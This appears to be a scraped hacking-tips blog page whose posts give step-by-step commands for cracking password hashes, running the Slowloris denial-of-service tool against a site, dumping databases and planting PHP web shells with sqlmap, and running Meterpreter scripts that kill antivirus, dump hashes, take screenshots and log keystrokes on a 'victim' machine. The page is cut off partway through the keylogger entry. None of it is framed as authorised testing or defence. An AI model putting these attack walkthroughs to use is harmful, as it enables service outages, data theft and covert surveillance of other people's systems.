<div dir="ltr" style="text-align: left;" trbidi="on">How to crack any hash with help of online services?<br /><br />findmyhash.py try to crack different types of hashes using free online services.<br /><br />(1)Download it from <a href="http://code.google.com/p/findmyhash/downloads/list" target="_blank">here</a> .<br /><br />(2)Open terminal & change directory where you download tool , if we download tool in download folder then type in following command in terminal<br /><br />cd Downloads<br /><br />(3)python findmyhash.py<br /><br /><br />Accepted algorithms are:<br /><br />MD4, MD5, SHA1, SHA256, RMD160, LM, NTLM, MYSQL, CISCO7 & JUNIPER<br /><br />NOTE: for LM / NTLM it is recommended to introduce both values with this format:<br /><br />python findmyhash.py LM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7<br /><br />python findmyhash.py NTLM -h 9a5760252b7455deaad3b435b51404ee:0d7f1f2bdeac6e574d6e18ca85fb58a7<br /><br /><br />Valid OPTIONS are:<br /><br />-h <hash_value> If you only want to crack one hash, specify its value with this option.<br /><br />-f <file> If you have several hashes, you can specify a file with one hash per line.<br /><br />NOTE: All of them have to be the same type.<br /><br />-g If your hash cannot be cracked, search it in Google and show all the results.<br /><br />NOTE: This option ONLY works with -h (one hash input) option.<br /><br /><br />Examples:<br /><br />-> Try to crack only one hash.<br /><br />python findmyhash.py MD5 -h 098f6bcd4621d373cade4e832627b4f6<br /><br />-> If the hash cannot be cracked, it will be searched in Google.<br /><br />python findmyhash.py SHA1 -h A94A8FE5CCB19BA61C4C0873D391E987982FBBD3 -g<br /><br />-> Try to crack multiple hashes using a file (one hash per line).<br /><br />python findmyhash.py MYSQL -f mysqlhashesfile.txt</div>

How to crack any hash with help of online services?

How to crack any hash with help of online services? findmyhash.py try to crack different types of hashes using free online services. (1)Down...

+ Read more »

how to crack md5 hash in ubuntu?

<div dir="ltr" style="text-align: left;" trbidi="on"><br />If you have an password in md5 hash and you need password in plain text for this there is lot of tool and online websites too but they wont crack all md5 hash if your hash exist in thier database they will give u plain text password but if not than u have to use some tool like here.<br /><br />We are using a perl script to crack an hash so we had encrypted an text "r2/." into a md5 hash which is "5d28a1f53e24a8b0a85d0a53348d49ad" so here we will try to decrypt it again with perl in a plain text.<br /><br />So first of all here we already know the length of text is 4 and it is included with specail characters like ". /" etc so our job will be easy but if we dont know the length and what kind of character included in hash then what? no problem we have some solution for that too ok lets began with first step if u are using linux here we are using back track for this first of all you need perl script so donalod and follow the steps to crack a hash i will try to explain each part of this script<br /><br />(1)Download perl script from <a href="http://www.4shared.com/file/qzT7EjeS/md5crack.html" target="_blank">here</a>.<br /><br />(2)Make it exexcutable.<br /><br />(3)open terminal & change directory where you download script.<br /><br />(4)now type following command in terminal<br /><br />perl md5crack.pl<br /><br />you can see information about script. <br /><div style="margin-bottom: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"> </span></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP_dYgk1zUg1D8vScBUW_5GaibQ4SEQm1EU8EJvvgR0ykiN-YAr-le55CeaKMci0T2oH8xvEAz8YE41q3Vy_R5hrb38dk_cSJxxULkOjlCdJOEkySHEEPpUtsomWFKnemhXqSg-5uu-BWj/s1600/Screenshot.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP_dYgk1zUg1D8vScBUW_5GaibQ4SEQm1EU8EJvvgR0ykiN-YAr-le55CeaKMci0T2oH8xvEAz8YE41q3Vy_R5hrb38dk_cSJxxULkOjlCdJOEkySHEEPpUtsomWFKnemhXqSg-5uu-BWj/s400/Screenshot.jpg" width="400" /></a></div><div style="margin-bottom: 0in;"><br /></div>(5)type following in terminal & hit enter.<br /><br />perl md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72<br /><br />our command will be like this > perl md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72<br /><br />ad is charset if we will use ad option that means it will try only lowercase alphabets and all digits 0-9 now 1 is minimum lenth of hash character like a b c etc and 3 is maximum lenth of hash so this command will try all lowercase alpha numerical from 1 to 3 lenth so if password is like abc or ab9 tc it will show us result now lets see next command line <br /><br />  <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0sTeVGVJCRG7-A2X7k6lQRZ5BLbSjdE51C-rcsySXacaUJ9pYTsjPt3emzRAIeVH2GXStZcb4ER4Mznmd4S-u-PPxjE2Iz7yD1CyLOLJgLJGeWQnHCb7d2E9NVEb88BsIau0iTaLL85sM/s1600/Screenshot2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="crack-md5-hash-in-ubuntu" border="0" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0sTeVGVJCRG7-A2X7k6lQRZ5BLbSjdE51C-rcsySXacaUJ9pYTsjPt3emzRAIeVH2GXStZcb4ER4Mznmd4S-u-PPxjE2Iz7yD1CyLOLJgLJGeWQnHCb7d2E9NVEb88BsIau0iTaLL85sM/s400/Screenshot2.jpg" title="crack md5 hash in ubuntu" width="400" /></a></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><br /></div>(6)type following in terminal & hit enter.<br /><br />perl md5crack.pl aA 3 3 900150983cd24fb0d6963f7d28e17f72<br /><br />see here aA charset if we will use this option than it will try<br /><br />lower,uppercase alpha numerical word like "Jt3" and minimum length 3 and maximum is 3 it means it will try like this aaa,aab,aac ............aAc etc now lets move on last command line<br /><br />(7)Type following command in terminal.<br /><br />perl md5crack.pl aAdx 1 10 900150983cd24fb0d6963f7d28e17f72<br /><br />here is charset is aAdx it will try lower,upperalpha numerical and specail charater ./*-+& etc. here minimum lenth is 1 and maximum is 10 to it will start from a to aaaaaaaaaa the first command will finish our tast fast but if hash included only lowercase alpha numerical word secound will try uppercase so it will took more than first command and thrid one will took more then first and second command so how to finish our job fast ok for cracking an hash i will say use more shell in one time like see normaly an pass length will be minimum 4 digits so we can start from 4 and maximum may be 10 or more so here what to do we can use 6 shell in one time for first command i will give u example here.<br /><br />(8)it`s our last example.<br /><br />perl md5crack.pl 4 4 900150983cd24fb0d6963f7d28e17f72<br /><br />perl md5crack.pl ad 4 4 <hash here> this command will try only 4 charcter lenght word so in second shell we can try 5 5 so that will try only 5 charcter lengh word<br /><br />perl md5crack.pl ad 5 5 <hash here> like this we can use 6 6, 7 7, 8 8 , etc so minimum and maximum length will be same so task will be finish fast and it depend on charset what kind of charset you are trying like ad,aA or aAdx now as i told here i have an example to make understand>>> text= "r2/." and encrypted md5 hash is "5d28a1f53e24a8b0a85d0a53348d49ad" we will try to crack it again in plain text here we will try command line > perl md5crack.pl aAdx 4 4 5d28a1f53e24a8b0a85d0a53348d49ad  </div>

how to crack md5 hash in ubuntu?

If you have an password in md5 hash and you need password in plain text for this there is lot of tool and online websites too but they wont ...

+ Read more »

How to install & use SLOWLORIS in ubuntu?

<div dir="ltr" style="text-align: left;" trbidi="on">(1)Open a browser and go to this URL: ‘http://ha.ckers.org/slowloris‘ (here you can know more about what is SLOWLORIS, & what it can do)<br /><br />(2)Scroll down to the bottom of the page and right click, the slowloris link ‘save link as’ and save the file to your desktop.<br /><br />(3)Open a terminal and type this command: cd Desktop and hit enter. This moves the working directory to your desktop.<br /><br />(4)Then type in your terminal:<br /><br />sudo apt-get install perl-doc<br /><br />and enter your password when prompted. This installs the Perl documentation module you’ll need to see the Slowloris help page. Wait while the packages download and install.<br /><br />(5)Then type this command, (all in one line) and press enter:<br /><br />sudo apt-get install libhtml-parser-perl libio-socket-ssl-perl<br /><br />(6)When ask yes/no type Y and press enter, this installs some libraries for Slowloris.<br /><br />Again type another command, this time:<br /><br />perldoc slowloris.pl<br /><br />and hit enter. This will show the documentation for Slowloris. I usually type Crtl+X+Y=enter to save it as a record but if you like you can just scan it and type Crtl+X to get rid of it.<br /><br />(7)Next you should type<br /><br />sudo perl slowloris.pl -dns example.com -port 80 -test<br /><br />hit enter and password if requested. This tests the server to see what it’s timeout window is. Wait until the test finishes, it will take several minutes. When it’s done it will tell you what timeout value to use….something along the likes of ‘Use 240 seconds for -timeout’.<br /><br />(8)In the terminal window type,<br /><br />sudo perl slowloris.pl -dns example.com -port 80 -timeout 240 -num 500 -tcpto 5<br /><br />This performs the actual attack, if your time out test told you to use another timeout value use that.<br /><br />(9)In your browser window reload the target page and you should see an error message that the server is unavailable. The attack has made the target site unavailable to all users.<br /><br />To stop the attack just type Ctrl+C.</div>

How to install & use SLOWLORIS in ubuntu?

(1)Open a browser and go to this URL: ‘http://ha.ckers.org/slowloris‘ (here you can know more about what is SLOWLORIS, & what it can do)...

+ Read more »

HOW TO DO SQL INJECTION FROM LINUX?

<div dir="ltr" style="text-align: left;" trbidi="on">Here is SQL injection tools for linux. It`s SQLMAP. SQLMAP is python based tool , so you can run in any os which has python installed.So it also works in windows.SQLMAP is far more advanced than <a href="http://tipstrickshack.blogspot.com/2012/09/hacking-website-using-sql-injection.html">HAVIJ</a>.<br /><br /><h3 style="text-align: left;">How To Use SqlMap?</h3><br />(1)Download SQLMAP <a href="https://github.com/sqlmapproject/sqlmap/archive/master.zip">here</a>.<br /><br />(2)Now extract it wherever you want.<br /><br />(3)Change directory & I mean if you extract to download then, open terminal & type following code<br /><br />cd Downloads<br /><br />cd sqlmapproject-sqlmap-f305dde<br /><br />(4)Now if you want to find url is vulnerable to sql injection or not. Type following command<br /><br />nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website”<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimTAxLQliXE0ckdrDcpEMu-EPIyCCI_8Wvsk-Bgd7x2LM4p5cpQJbhYFpBCzFyDnQYMct7qIePZTWfydFe6laP9IfET3NkFsWBG2HmCbvRNNC7BmffIq1g8PWIjrtuSgc29UnTQ2LizdXL/s1600/sqlmap.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="sql-injection-test" border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimTAxLQliXE0ckdrDcpEMu-EPIyCCI_8Wvsk-Bgd7x2LM4p5cpQJbhYFpBCzFyDnQYMct7qIePZTWfydFe6laP9IfET3NkFsWBG2HmCbvRNNC7BmffIq1g8PWIjrtuSgc29UnTQ2LizdXL/s320/sqlmap.PNG" title="sql-injection-test" width="320" /></a></div><br />(5)To get database of website. Type following command in terminal<br /><br />nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website” --dbs<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGZa5lsIyIfpS2PKJxYuZqRI83xcaMzLmAoRRXBUhkUHDS17m5UcD6M9687uzSvkLAzLqBnf1BIlU5-ITNe9Kc6ECyqFvdtqivsV8APi4nDiVyO5Q45N7vubX0YsBNDGXG1ROf0M4BEWUD/s1600/sqlmap-1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="sqlmap-dbs" border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGZa5lsIyIfpS2PKJxYuZqRI83xcaMzLmAoRRXBUhkUHDS17m5UcD6M9687uzSvkLAzLqBnf1BIlU5-ITNe9Kc6ECyqFvdtqivsV8APi4nDiVyO5Q45N7vubX0YsBNDGXG1ROf0M4BEWUD/s320/sqlmap-1.PNG" title="sqlmap-dbs" width="320" /></a></div><br />(6)To get tables & columns of database , type following command<br /><br />nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website”--tables --columns<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE0EVhA7UkJKpgTm4zrSp3rM7VHzRrUCDXHx2UK9Sc3ZxgP8xPR5h2cXUmYXiql_yTJpsA3Oj9vynzoIiA2-8boAeRU7gEiirrkCuOrWtu15ZS_zPOBxG3jsjkj8DFhja4tZj6xTuLS8hu/s1600/sqlmap-2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="sqlmap-tables-column" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE0EVhA7UkJKpgTm4zrSp3rM7VHzRrUCDXHx2UK9Sc3ZxgP8xPR5h2cXUmYXiql_yTJpsA3Oj9vynzoIiA2-8boAeRU7gEiirrkCuOrWtu15ZS_zPOBxG3jsjkj8DFhja4tZj6xTuLS8hu/s1600/sqlmap-2.PNG" title="sqlmap-tables-column" /></a></div><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9yZahhVsfRG1Nb58t2qI20kwUBfzbdc5kgN2BdOTuSPgNK8TOWQ8iXW4jvbl94Pqw_j9KWo2TQB2K93VpiqpqXtMdaNwc9Va8KoRJPGVbzwemGplLdg5PjC9A5Kb2MBU54JWlgwhlSjZ5/s1600/sqlmap-table-column.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="sqlmap-tables-column" border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9yZahhVsfRG1Nb58t2qI20kwUBfzbdc5kgN2BdOTuSPgNK8TOWQ8iXW4jvbl94Pqw_j9KWo2TQB2K93VpiqpqXtMdaNwc9Va8KoRJPGVbzwemGplLdg5PjC9A5Kb2MBU54JWlgwhlSjZ5/s320/sqlmap-table-column.PNG" title="sqlmap-tables-column" width="190" /></a></div><br />(7)To Get data of particular database & Table , type following command<br /><br />nirav@ubuntu:~/Downloads/sqlmapproject-sqlmap-f305dde$ ./sqlmap.py -u “vulnerable url of website” --dump -D “database_name” -T “table _name”<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEg1p6PZ2SoaQIYIhXPTHDCNCl2E6A6UikYLe3FABzXgZP9M6l5SZ6xY6C5-PNGIFt78Ud40eJfaSem8BDyb4jkLzlFNflPV-Lwx-metPzgmPmE3FpJhRXj2n-s237dSD26d0MVnPnxaT9/s1600/sqlmap-dump.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="sqlmap-dump" border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEg1p6PZ2SoaQIYIhXPTHDCNCl2E6A6UikYLe3FABzXgZP9M6l5SZ6xY6C5-PNGIFt78Ud40eJfaSem8BDyb4jkLzlFNflPV-Lwx-metPzgmPmE3FpJhRXj2n-s237dSD26d0MVnPnxaT9/s1600/sqlmap-dump.PNG" title="sqlmap-dump" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUoOb3vUQpBmMwIWj7vsR8kTbJ8u-ZUiXYHQ4AYPKn31iI_IVw6jfjSonqzGHWNU5ZjZdm84sm9h8NWduP71Rg9GWrPisld3O0LPdyrAYi0_wvXiuo14c48mQ_Juz5YaiYmkVORpvrKGtV/s1600/sqlmap-dump-data.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="sqlmap-dump-data" border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUoOb3vUQpBmMwIWj7vsR8kTbJ8u-ZUiXYHQ4AYPKn31iI_IVw6jfjSonqzGHWNU5ZjZdm84sm9h8NWduP71Rg9GWrPisld3O0LPdyrAYi0_wvXiuo14c48mQ_Juz5YaiYmkVORpvrKGtV/s320/sqlmap-dump-data.PNG" title="sqlmap-dump-data" width="320" /></a></div><br /><br />Now , you can view all database from following directory.<br /><br />/home/nirav/Downloads/sqlmapproject-sqlmap-f305dde/output<br /><br /><h3 style="text-align: left;">What`s next you can do?</h3><br />1-Execute arbitrary Sql command on the server<br /><br />This is probably the easiest thing to do on a server that is vulnerable to sql injection. The --sql-query parameter can be used to specify a sql query to execute. Things of interest would be to create a user in the users table or something similar. Or may be change/modify the content of cms pages etc.<br /><br />Another parameter --sql-shell would give an sql shell like interface to run queries interactively.<br /><br />2-Get inside the admin panel and play<br /><br />If the website is running some kind of custom cms or something similar that has an admin panel, then it might be possible to get inside provided you are able to crack the password retrieved in the database dump. Simple and short length passwords can be broken simply by brute forcing, however long length complex passwords may not be breakable.<br /><br />Check if the admin panel allows to upload some files. If an arbitrary php file can be uploaded then it be a lot greater fun. The php file can contain shell_exec, system ,exec or passthru function calls and that will allow to execute arbitrary system commands. Php web shell scripts can be uploaded to do the same thing.<br /><br />3-Shell on remote OS<br /><br />This is the thing to do to completely takeover the server. However note that it is not as easy and trivial as the tricks shown above. sqlmap comes with a parameter call --os-shell that can be used to try to get a shell on remote system, but it has many limitations of its own.</div>

HOW TO DO SQL INJECTION FROM LINUX?

Here is SQL injection tools for linux. It`s SQLMAP. SQLMAP is python based tool , so you can run in any os which has python installed.So it ...

+ Read more »

Some of the Cool Metasploit Metrepreter script

<div dir="ltr" style="text-align: left;" trbidi="on"> <br /><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><strong><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">Getcountermeasure</span></span></span></span></strong></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Getcountermeasure is an automated script Disable security measures such as antivirus, firewall, and more.</span></span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Command:- run g<strong><span style="font-weight: normal;">etcountermeasure</span></strong></span></span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><strong><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">G</span></span></span></span></strong><strong><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">etgui</span></span></span></span></strong></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">getgui script is used to enable RDP on a target system.</span></span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Command:- run g<strong><span style="font-weight: normal;">etgui -e</span></strong></span></span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><strong><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">Get</span></span></span></span></strong><strong><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">Telnet</span></span></span></span></strong></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">gettelnet script is used to enable telnet on the victim.</span></span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Command:- run g<strong><span style="font-weight: normal;">ettelnet -e</span></strong></span></span></span></div><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span><strong><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">Winenum</span></span></span></span></strong><br /> <div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Winenum script is used to dump tokens, hashes.</span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Command:- run winenum</span></span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><br /></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><strong><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">Getlocalsubnet</span></span></span></span></strong></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">getlocalsubnet script is used to get the local subnet mask of a victim.</span></span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Command:- run get local subnets</span></span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><br /></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><strong><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">Killav</span></span></span></span></strong></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Killav used to disable most antivirus programs.</span></span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Command:- run killav</span></span></span></div><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><br /></span></span><strong><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">Checkvm</span></span></span></span></strong><br /> <div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Checkvm used to see if you exploited a virtual machine.</span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Command:- run checkvm</span></span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"></div><a name="more"></a><br /><br /> <div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><strong><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">Scraper</span></span></span></span></strong></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Scraper is an automated script that gathers the victim machine environment information.</span></span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Command:- run scraper</span></span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><br /></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><strong><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">Screenspy</span></span></span></span></strong></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">screenspy used to take screenshot f remote pc.</span></span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">Command:- run screenspy -t 10</span></span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><br /></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><strong><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;"><span style="font-weight: normal;">Keylogrecorder</span></span></span></span></strong></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">keylogrecorder used to start keylogger in victim pc.</span></span></span></div><div style="border-bottom-style: none; border-color: initial; border-image: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; line-height: 0.2in; margin-bottom: 0in; padding-bottom: 0in; padding-left: 0in; padding-right: 0in; padding-top: 